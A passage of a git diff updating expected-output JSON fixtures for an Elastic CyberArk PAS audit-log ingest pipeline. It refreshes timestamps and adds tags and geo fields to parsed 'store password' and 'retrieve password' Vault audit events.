2, "action": "auto clear safes history end", - "ingested": "2021-12-09T13:36:44.514883300Z", + "ingested": "2021-12-14T14:42:09.597428026Z", "original": "\u003c5\u003e1 2021-03-09T09:00:47Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 09 01:00:47\",\"IsoTimestamp\":\"2021-03-09T09:00:47Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"291\",\"Desc\":\"Auto Clear Safes History end\",\"Severity\":\"Info\",\"Issuer\":\"Batch\",\"Action\":\"Auto Clear Safes History end\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"0.0.0.0\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Auto Clear Safes History end\",\"GatewayStation\":\"\"}}}", "code": "291", "kind": "event" - } + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-294-store-password.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-294-store-password.log-expected.json index eb5b8ea3f8b..234232ff74a 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-294-store-password.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-294-store-password.log-expected.json @@ -62,7 +62,7 @@ "event": { "severity": 2, "action": "store password", - "ingested": "2021-12-09T13:36:44.612758400Z", + "ingested": "2021-12-14T14:42:09.706883772Z", "original": "\u003c5\u003e1 2021-03-08T10:19:42Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 08 02:19:42\",\"IsoTimestamp\":\"2021-03-08T10:19:42Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"294\",\"Desc\":\"Store password\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"Store password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Test\",\"File\":\"Root\\\\Groups\\\\WindowsGroup\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Store password\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WindowsDesktopLocalAccountsRotationalPolicy\"},{\"Name\":\"InProcess\",\"Value\":\"ChangeTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"LastTask\",\"Value\":\"ChangeTask\"},{\"Name\":\"LastSuccessChange\",\"Value\":\"1615198782\"},{\"Name\":\"CurrInd\",\"Value\":\"2\"}]}}}}", "code": "294", "kind": "event" @@ -129,7 +129,7 @@ "event": { "severity": 2, "action": "store password", - "ingested": "2021-12-09T13:36:44.612767300Z", + "ingested": "2021-12-14T14:42:09.706886157Z", "original": "\u003c5\u003e1 2021-03-08T18:24:49Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 08 10:24:49\",\"IsoTimestamp\":\"2021-03-08T18:24:49Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"294\",\"Desc\":\"Store password\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Store password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Test\",\"File\":\"Root\\\\Operating System-WinDesktopLocal-Address-adriansr\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Store password\",\"GatewayStation\":\"10.0.1.20\"}}}", "code": "294", "kind": "event" @@ -208,7 +208,7 @@ "event": { "severity": 2, "action": "store password", - "ingested": "2021-12-09T13:36:44.612772900Z", + "ingested": "2021-12-14T14:42:09.706886645Z", "original": "\u003c5\u003e1 2021-03-08T19:20:02Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 08 11:20:02\",\"IsoTimestamp\":\"2021-03-08T19:20:02Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"294\",\"Desc\":\"Store password\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"Store password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Test\",\"File\":\"Root\\\\Operating System-WindowsDesktopLocalAccountsRotationalPolicy-10.0.1.20-x_accountA\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Store password\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDesktopLocal\"},{\"Name\":\"UserName\",\"Value\":\"x_accountA\"},{\"Name\":\"Address\",\"Value\":\"components\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ChangeTask\"},{\"Name\":\"InProcess\",\"Value\":\"ChangeTask\"},{\"Name\":\"SequenceID\",\"Value\":\"26\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastTask\",\"Value\":\"ChangeTask\"},{\"Name\":\"StartChangeNotBefore\",\"Value\":\"1615231182\"},{\"Name\":\"GroupName\",\"Value\":\"WindowsGroup\"},{\"Name\":\"LastSuccessChange\",\"Value\":\"1614785704\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"Index\",\"Value\":\"1\"},{\"Name\":\"DualAccountStatus\",\"Value\":\"Inactive\"},{\"Name\":\"VirtualUsername\",\"Value\":\"virtual\"}]}}}}", "code": "294", "kind": "event" @@ -276,7 +276,7 @@ "event": { "severity": 2, "action": "store password", - "ingested": "2021-12-09T13:36:44.612778200Z", + "ingested": "2021-12-14T14:42:09.706887131Z", "original": "\u003c5\u003e1 2021-03-10T14:38:57Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 06:38:57\",\"IsoTimestamp\":\"2021-03-10T14:38:57Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"294\",\"Desc\":\"Store password\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"Store password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Test\",\"File\":\"Root\\\\Groups\\\\WindowsGroup\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Store password\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WindowsDesktopLocalAccountsRotationalPolicy\"},{\"Name\":\"InProcess\",\"Value\":\"ChangeTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"LastTask\",\"Value\":\"ChangeTask\"},{\"Name\":\"LastSuccessChange\",\"Value\":\"1615387136\"},{\"Name\":\"CurrInd\",\"Value\":\"1\"}]}}}}", "code": "294", "kind": "event" @@ -289,6 +289,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, @@ -334,7 +343,7 @@ "event": { "severity": 2, "action": "store password", - "ingested": "2021-12-09T13:36:44.612783600Z", + "ingested": "2021-12-14T14:42:09.706887528Z", "original": "\u003c5\u003e1 2021-03-10T17:58:06Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 09:58:06\",\"IsoTimestamp\":\"2021-03-10T17:58:06Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"294\",\"Desc\":\"Store password\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Store password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\PSMServer\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Store password\",\"GatewayStation\":\"\"}}}", "code": "294", "kind": "event" @@ -347,6 +356,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", "ip": "67.43.156.14" }, @@ -392,7 +410,7 @@ "event": { "severity": 2, "action": "store password", - "ingested": "2021-12-09T13:36:44.612789Z", + "ingested": "2021-12-14T14:42:09.706887944Z", "original": "\u003c5\u003e1 2021-03-10T22:17:26Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 14:17:26\",\"IsoTimestamp\":\"2021-03-10T22:17:26Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"294\",\"Desc\":\"Store password\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Store password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\PSM-ASR-CYBERARK-WI\",\"Station\":\"67.43.156.14\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Store password\",\"GatewayStation\":\"\"}}}", "code": "294", "kind": "event" @@ -471,7 +489,7 @@ "event": { "severity": 2, "action": "store password", - "ingested": "2021-12-09T13:36:44.612794500Z", + "ingested": "2021-12-14T14:42:09.706888376Z", "original": "\u003c5\u003e1 2021-03-10T23:39:25Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 15:39:25\",\"IsoTimestamp\":\"2021-03-10T23:39:25Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"294\",\"Desc\":\"Store password\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"Store password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Test\",\"File\":\"Root\\\\Operating System-WindowsDesktopLocalAccountsRotationalPolicy-10.0.1.20-x_accountB\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Store password\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDesktopLocal\"},{\"Name\":\"UserName\",\"Value\":\"x_accountB\"},{\"Name\":\"Address\",\"Value\":\"components\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ChangeTask\"},{\"Name\":\"InProcess\",\"Value\":\"ChangeTask\"},{\"Name\":\"SequenceID\",\"Value\":\"24\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastTask\",\"Value\":\"ChangeTask\"},{\"Name\":\"StartChangeNotBefore\",\"Value\":\"1615419536\"},{\"Name\":\"GroupName\",\"Value\":\"WindowsGroup\"},{\"Name\":\"LastSuccessChange\",\"Value\":\"1614868762\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"Index\",\"Value\":\"2\"},{\"Name\":\"DualAccountStatus\",\"Value\":\"Inactive\"},{\"Name\":\"VirtualUsername\",\"Value\":\"virtual\"}]}}}}", "code": "294", "kind": "event" @@ -540,7 +558,7 @@ "event": { "severity": 2, "action": "store password", - "ingested": "2021-12-09T13:36:44.612799800Z", + "ingested": "2021-12-14T14:42:09.706888771Z", "original": "\u003c5\u003e1 2021-03-14T11:48:26Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 04:48:26\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T11:48:26Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e294\u003c/MessageID\u003e\\n \u003cDesc\u003eStore password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eStore password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003eTest\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Groups\\\\WindowsGroup\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eStore password\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"WindowsDesktopLocalAccountsRotationalPolicy\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"InProcess\\\" Value=\\\"ChangeTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ChangeTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessChange\\\" Value=\\\"1615722505\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CurrInd\\\" Value=\\\"2\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 04:48:26\",\"IsoTimestamp\":\"2021-03-14T11:48:26Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"294\",\"Desc\":\"Store password\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"Store password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Test\",\"File\":\"Root\\\\Groups\\\\WindowsGroup\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Store password\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WindowsDesktopLocalAccountsRotationalPolicy\"},{\"Name\":\"InProcess\",\"Value\":\"ChangeTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"LastTask\",\"Value\":\"ChangeTask\"},{\"Name\":\"LastSuccessChange\",\"Value\":\"1615722505\"},{\"Name\":\"CurrInd\",\"Value\":\"2\"}]}}}}", "code": "294", "kind": "event" @@ -620,7 +638,7 @@ "event": { "severity": 2, "action": "store password", - "ingested": "2021-12-09T13:36:44.612805300Z", + "ingested": "2021-12-14T14:42:09.706889414Z", "original": "\u003c5\u003e1 2021-03-15T10:12:21Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 03:12:21\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T10:12:21Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e294\u003c/MessageID\u003e\\n \u003cDesc\u003eStore password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eStore password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003eTest\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-WindowsDesktopLocalAccountsRotationalPolicy-10.0.1.20-x_accountA\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eStore password\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"WinDesktopLocal\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"x_accountA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"components\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ChangeTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"InProcess\\\" Value=\\\"ChangeTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"SequenceID\\\" Value=\\\"27\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ChangeTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"StartChangeNotBefore\\\" Value=\\\"1615754905\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"GroupName\\\" Value=\\\"WindowsGroup\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessChange\\\" Value=\\\"1615231204\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Index\\\" Value=\\\"1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DualAccountStatus\\\" Value=\\\"Inactive\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"VirtualUsername\\\" Value=\\\"virtual\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 03:12:21\",\"IsoTimestamp\":\"2021-03-15T10:12:21Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"294\",\"Desc\":\"Store password\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"Store password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Test\",\"File\":\"Root\\\\Operating System-WindowsDesktopLocalAccountsRotationalPolicy-10.0.1.20-x_accountA\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Store password\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDesktopLocal\"},{\"Name\":\"UserName\",\"Value\":\"x_accountA\"},{\"Name\":\"Address\",\"Value\":\"components\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ChangeTask\"},{\"Name\":\"InProcess\",\"Value\":\"ChangeTask\"},{\"Name\":\"SequenceID\",\"Value\":\"27\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastTask\",\"Value\":\"ChangeTask\"},{\"Name\":\"StartChangeNotBefore\",\"Value\":\"1615754905\"},{\"Name\":\"GroupName\",\"Value\":\"WindowsGroup\"},{\"Name\":\"LastSuccessChange\",\"Value\":\"1615231204\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"Index\",\"Value\":\"1\"},{\"Name\":\"DualAccountStatus\",\"Value\":\"Inactive\"},{\"Name\":\"VirtualUsername\",\"Value\":\"virtual\"}]}}}}", "code": "294", "kind": "event" @@ -703,7 +721,7 @@ "event": { "severity": 2, "action": "store password", - "ingested": "2021-12-09T13:36:44.612810100Z", + "ingested": "2021-12-14T14:42:09.706889802Z", "original": "\u003c5\u003e1 2021-03-15T13:13:01Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 06:13:01\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T13:13:01Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e294\u003c/MessageID\u003e\\n \u003cDesc\u003eStore password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eStore password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eStore password\u003c/Message\u003e\\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615813465\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 06:13:01\",\"IsoTimestamp\":\"2021-03-15T13:13:01Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"294\",\"Desc\":\"Store password\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Store password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-67.43.156.15-testark\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Store password\",\"GatewayStation\":\"10.0.1.20\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615813465\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "294", "kind": "event" diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-295-retrieve-password.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-295-retrieve-password.log-expected.json index b470772f336..34b98e708ab 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-295-retrieve-password.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-295-retrieve-password.log-expected.json @@ -68,7 +68,7 @@ "event": { "severity": 2, "reason": "AIM password request", - "ingested": "2021-12-09T13:36:45.560089Z", + "ingested": "2021-12-14T14:42:10.855172542Z", "original": "{\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eno\u003c/Rfc5424\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.6.0000\u003c/Version\u003e\\n \u003cMessageID\u003e295\u003c/MessageID\u003e\\n \u003cDesc\u003eRetrieve password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eProv_PVWA\u003c/Issuer\u003e\\n \u003cAction\u003eRetrieve password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n 